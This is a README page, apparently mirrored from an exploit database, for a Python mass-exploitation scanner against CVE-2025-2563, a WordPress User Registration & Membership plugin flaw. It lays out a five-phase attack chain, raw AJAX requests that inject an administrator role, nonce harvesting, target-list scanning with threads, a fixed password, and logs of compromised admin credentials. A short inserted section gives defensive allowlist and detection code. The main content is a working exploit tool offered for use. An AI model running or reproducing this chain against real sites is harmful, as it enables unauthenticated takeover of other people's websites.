## https://sploitus.com/exploit?id=ACF85111-96A2-5629-8D81-7440CC4E0D7F
# CVE-2025-2563
The User Registration & Membership WordPress plugin before 4.1.2 does not prevent users from setting their own account role when the Membership Addon is enabled, leading to a privilege escalation issue that allows unauthenticated users to gain admin privileges.

---

## 🔴 Vulnerability Overview

### CVE-2025-2563: Unauthenticated Privilege Escalation via Membership Addon Role Injection

| Field | Details |
|---|---|
| **CVE ID** | CVE-2025-2563 |
| **Severity** | **HIGH** (CVSS v3.1 Score: **8.1**) |
| **Vector** | `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **ADP** | CISA-ADP |
| **Affected Software** | User Registration & Membership Plugin for WordPress |
| **Affected Versions** | All versions **before 4.1.2** |
| **Vulnerability Type** | Improper Privilege Management: Unauthenticated Administrator Account Creation |
| **Authentication Required** | **None** |
| **CWE** | CWE-269: Improper Privilege Management |

**Description:**  
The **User Registration & Membership** plugin for WordPress versions before **4.1.2** fails to enforce server-side role restrictions when the **Membership Addon** is enabled. During the membership registration process, the plugin accepts a user-supplied `role` field within the `user_registration_membership_register_member` AJAX action without validating it against a server-side allowlist. A completely unauthenticated remote attacker can submit a crafted two-step AJAX chain (first registering a new user account via `user_registration_user_form_submit`, then injecting `"role": "administrator"` into the `members_data` payload of the membership call) to silently create a fully privileged WordPress **Administrator** account. This results in complete site compromise with no authentication or user interaction required.

---

## πŸ› οΈ Tool Description

This is a **Proof-of-Concept (PoC) mass exploitation scanner** targeting WordPress installations running a vulnerable version of the **User Registration & Membership** plugin with the Membership Addon active. The tool performs intelligent multi-stage exploitation with automatic discovery, nonce harvesting, combo-based registration, role injection, and admin verification.

### 🔗 Full Attack Chain

```
[Phase 1 - Discovery]
  GET /membership-pricing/        →  Extract membership_id, pricing links
  GET /membership-registration/   →  Extract form_id, nonces, security tokens
  GET /registration/              →  Fallback registration page

          ↓

[Phase 2 - Nonce Extraction]
  Parse: ur_membership_frontend_localized_data._nonce
  Parse: ur_frontend_form_nonce, security, form_id, membership_id

          ↓

[Phase 3 - Registration (Combo Attack)]
  POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  form_data=[{user_login, user_email, user_pass, membership_field, ...}]
  security=  |  ur_frontend_form_nonce=
  →  Try all valid combos until success=true

          ↓

[Phase 4 - Role Injection (CVE-2025-2563)]
  POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator","membership":"",...}
  _wpnonce=
  →  Server assigns administrator role to newly created user

          ↓

[Phase 5 - Admin Verification]
  POST /wp-login.php              →  Login with new credentials
  GET  /wp-admin/                 →  Check adminmenu / wp-admin-bar
  GET  /wp-admin/users.php        →  Confirm manage_options access
  GET  /wp-admin/plugin-install.php →  Confirm plugin-install access

          ↓

[Save to Nx_admin.txt]
  Format: [timestamp] https://target.com/wp-login.php user: pass:
```

---

## 📋 Requirements

### System Requirements
- Python **3.8** or higher
- Linux / Windows / macOS

### Python Dependencies

```bash
pip install requests urllib3 rich
```

Or via requirements file:

```bash
pip install -r requirements.txt
```

**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0
```

---

## 🚀 Installation

```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2025-2563.git
cd CVE-2025-2563

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2025-2563.py
```

---

## βš™οΈ Usage

### Basic Run

```bash
python3 CVE-2025-2563.py
```

The tool uses a fully interactive terminal interface powered by **Rich**.

---

### πŸ—‚οΈ Target List Format

Create a plain text file (default: `list.txt`) β€” one target per line:

```
https://target1.com
https://target2.com
http://target3.com
target4.com
```

> Targets without `http://` or `https://` are automatically prefixed with `https://`.

---

### 🖥️ Interactive Prompts

```
Targets file [list.txt]:                    list.txt
Threads [3]:                                5
HTTP timeout (seconds) [10]:                10
Max registration attempts per target [20]:  20
```

> **Password** is fixed internally as `Nx_adminSA` for all registration attempts.

---

## 🔬 Exploitation Deep Dive

### Step 1: Multi-Page Discovery

The tool probes three pages automatically per target:

| Page | Purpose |
|---|---|
| `/membership-pricing/` | Extract `membership_id` and registration links |
| `/membership-registration/` | Extract form tokens, nonces, and field IDs |
| `/membership-registration/?membership_id=` | Plan-specific form extraction |
| `/registration/` | Fallback generic registration page |

---

### Step 2: Token Extraction

The following tokens are extracted from raw HTML and inline JavaScript:

| Token | Source |
|---|---|
| `_nonce` | `ur_membership_frontend_localized_data` JS object |
| `ur_frontend_form_nonce` | Hidden input field or JS object |
| `security` | `user_registration_params.user_registration_form_data_save` |
| `form_id` | Hidden input `ur-user-form-id` or JS object |
| `membership_id` | Radio input `urm_membership` or URL query string |

---

### Step 3: Registration AJAX (Combo Attack)

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&security=
&form_data=[{"field_name":"user_login","value":"Nxploited_482",...},
            {"field_name":"membership_field_1771350090","value":"","field_type":"radio"}]
&form_id=
&ur_frontend_form_nonce=
&is_membership_active=
&membership_type=
```

The tool automatically iterates over all discovered combinations of `security`, `frontend_nonce`, `form_id`, and `membership_id` until a `success: true` response is received.

---

### Step 4: Role Injection AJAX (The Vulnerable Call)

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&_wpnonce=
&members_data={"membership":"","payment_method":"free",
               "role":"administrator","username":"Nxploited_482",...}
&form_response={"username":"Nxploited_482","registration_type":"membership"}
```

> ⚠️ The server accepts the `role` field without any allowlist; this is the root cause of CVE-2025-2563.
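The missing server-side allowlist above is the whole bug, so this added example (not code from the plugin or from this tool) shows the defender's two halves of it: the role check a patched registration handler must apply, and a detector that flags the `user_registration_membership_register_member` call when its `members_data` asks for a privileged role. The allowlist, the role names beyond `administrator`, the `_membership_body` helper and the sample requests are constructed assumptions, not values from the page.

```python
import json
from urllib.parse import parse_qs, urlencode

# Roles a self-service membership signup may legitimately request (assumed site
# policy for this example); WordPress's privileged roles are deliberately absent.
ALLOWED_SELF_SERVICE_ROLES = {"subscriber", "member"}
DEFAULT_ROLE = "subscriber"
PRIVILEGED_ROLES = {"administrator", "editor", "author"}
VULNERABLE_ACTION = "user_registration_membership_register_member"

def assign_member_role(requested_role):
    """The check vulnerable versions lack: a client-supplied role is honoured
    only when it is on the allowlist; anything else gets the default role."""
    role = (requested_role or "").strip().lower()
    return role if role in ALLOWED_SELF_SERVICE_ROLES else DEFAULT_ROLE

def inspect_ajax_request(path, body):
    """Classify one captured x-www-form-urlencoded POST body to admin-ajax.php.
    Returns a finding dict for the membership-register action, otherwise None."""
    if not path.startswith("/wp-admin/admin-ajax.php"):
        return None
    fields = parse_qs(body, keep_blank_values=True)
    if fields.get("action", [""])[0] != VULNERABLE_ACTION:
        return None
    try:
        members = json.loads(fields.get("members_data", ["{}"])[0])
    except json.JSONDecodeError:
        return {"username": None, "role": None, "severity": "malformed"}
    role = str(members.get("role", "")).strip().lower()
    severity = "critical" if role in PRIVILEGED_ROLES else "info"
    return {"username": members.get("username"), "role": role, "severity": severity}

def scan_requests(captured):
    """Keep only findings where a privileged role was requested via the AJAX call."""
    findings = (inspect_ajax_request(path, body) for path, body in captured)
    return [f for f in findings if f and f["severity"] == "critical"]

def _membership_body(role, username):
    # Constructed body shaped like the Step 4 request; the nonce is a placeholder.
    members = {"membership": "3", "payment_method": "free", "role": role, "username": username}
    return urlencode({"action": VULNERABLE_ACTION, "_wpnonce": "PLACEHOLDER_NONCE",
                      "members_data": json.dumps(members)})

# Constructed sample traffic (not real captures): a Step 3 registration call,
# an injection attempt, and a benign membership signup.
SAMPLE_REQUESTS = [
    ("/wp-admin/admin-ajax.php", "action=user_registration_user_form_submit&form_id=12&security=x"),
    ("/wp-admin/admin-ajax.php", _membership_body("administrator", "constructed_482")),
    ("/wp-admin/admin-ajax.php", _membership_body("subscriber", "constructed_483")),
]
```

`scan_requests(SAMPLE_REQUESTS)` yields only the `administrator` finding, and `assign_member_role("administrator")` returns `subscriber`, which is the behaviour a fixed handler should have.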

---

## πŸ“ Output Files

| File | Description |
|---|---|
| `reg.txt` | All successful registration attempts with credentials |
| `Nx_admin.txt` | All confirmed administrator escalations |

### ✅ Output Format

**`reg.txt`:**
```
[2025-06-01 12:44:10] https://target.com/wp-login.php user:Nxploited_482 email:Nxploited_482@admin.sa pass:Nx_adminSA
```

**`Nx_admin.txt`:**
```
[2025-06-01 12:44:18] https://target.com/wp-login.php user:Nxploited_482 pass:Nx_adminSA
```

---

## 🖥️ Terminal Output Sample

```
╔══════════════════════════════════════════════════════════════════╗
║  User Registration Membership Full Chain                         ║
║  By: Nxploited  |  GitHub: github.com/Nxploited  |  @Kxploit     ║
╚══════════════════════════════════════════════════════════════════╝

[SCANNING]      https://target.com
[EXPLOITING]    https://target.com  |  nonce + reg OK
[EXPLOITED]     https://target.com  |  password: Nx_adminSA

┌──────────────────────────────────────────────────────────────────────────┐
│ Target               │ Status                       │ Password / Note    │
├──────────────────────────────────────────────────────────────────────────┤
│ https://target.com   │ ✅ COMPROMISED (exploited)   │ password: Nx_adminSA│
│ https://target2.com  │ VULNERABLE (nonce exposed)   │                    │
│ https://target3.com  │ DEAD (connection error)      │                    │
└──────────────────────────────────────────────────────────────────────────┘

Registration log:   reg.txt
Exploit (admin) log: Nx_admin.txt
```

---

## 📊 Status Codes Reference

| Status | Color | Meaning |
|---|---|---|
| `COMPROMISED (exploited)` | 🟢 Green | Full chain success: admin login verified |
| `COMPROMISED (exploit ok, admin not verified)` | 🟡 Yellow | Role injection succeeded but admin panel check inconclusive |
| `VULNERABLE (nonce exposed, registration failed)` | 🟡 Yellow | Membership nonce found but registration AJAX failed |
| `VULNERABLE (nonce exposed, exploit pending)` | 🟡 Yellow | Nonce found but exploitation could not be completed |
| `EXPLOITING` | 🟡 Yellow | Active exploitation in progress |
| `REGISTERED (no membership nonce)` | 🟡 Yellow | Registration succeeded but nonce not extractable |
| `NO REG (all attempts failed)` | ⚫ Dark | All security/nonce/form_id combo attempts exhausted |
| `NO REG (max attempts reached)` | ⚫ Dark | Hit the configured attempt cap |
| `DEAD (no membership/registration pages)` | ⚫ Dark | Plugin not detected on target |
| `EXPLOIT FAILED (request error)` | 🔴 Red | Network error during role injection call |
| `EXPLOIT FAILED (success=false)` | 🔴 Red | Server returned `success: false` on role injection |
| `TIMEOUT` | ⚫ Dark | HTTP timeout |
| `DEAD (connection error)` | ⚫ Dark | Connection refused / unreachable |
| `ERROR` | 🔴 Red | Unexpected exception |

---

## 📡 Contact & Author

By: Nxploited (Khaled Alenazi)

---

## ⚠️ Legal Disclaimer

> **THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH PURPOSES ONLY.**
>
> The author, **Nxploited (Khaled Alenazi)**, and all contributors to this project **do not condone, support, or take any responsibility** for the misuse of this tool or any damage caused by the use of this software against systems for which you do not have explicit written authorization.
>
> - ✅ **Permitted:** Use on systems you own or have been granted **explicit written permission** to test.
> - ❌ **Prohibited:** Use against any systems without prior explicit written authorization from the system owner.
>
> **Unauthorized access to computer systems is illegal and punishable under applicable laws** including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation worldwide.
>
> **By using this tool, you accept sole and full responsibility for your actions and confirm that you have the legal authority to test the targeted systems.**
>
> The author assumes **no liability** whatsoever for any direct, indirect, incidental, or consequential damages arising from the use or misuse of this software.

---

© 2025 Nxploited (Khaled Alenazi). For authorized security research only.